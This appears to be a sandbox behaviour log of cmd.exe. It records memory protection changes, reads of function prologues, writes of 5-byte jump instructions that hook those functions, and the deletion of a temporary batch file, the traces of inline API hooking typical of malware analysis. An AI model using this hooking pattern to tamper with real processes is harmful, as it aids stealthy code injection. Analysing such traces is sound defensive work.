Memory attributes changed PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 7C91632D Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2828873462
Memory attributes changed PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 77212EBC Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2828882487
Memory read PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 77212EBC Length: 30 Value: 8B FF 55 8B EC 83 EC 14 53 33 DB 56 33 F6 33 C0 39 5D 08 57 89 5D F8 89 5D EC 89 5D FC 75 success or wait 2828885380
File deleted Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828892544
Memory written PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: A90014 Length: 10 Value: 8B FF 55 8B EC E9 A3 2E 78 76 success or wait 2828903227
File opened Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false object name not found 2828903823
Memory written PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 77212EBC Length: 5 Value: E9 FD 4B F4 88 success or wait 2828959157
Memory attributes changed PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 77212EBC Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2828963202
Memory attributes changed PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 771C60A1 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2828967128
Memory read PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 771C60A1 Length: 30 Value: 8B FF 55 8B EC 6A 13 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 36 C6 FF FF 5D success or wait 2828968341
Memory written PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: A9001E Length: 10 Value: 8B FF 55 8B EC E9 7E 60 73 76 success or wait 2828990788
Memory written PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 771C60A1 Length: 5 Value: E9 6F 1A F9 88 success or wait 2828991816
Memory attributes changed PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 771C60A1 Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2828992136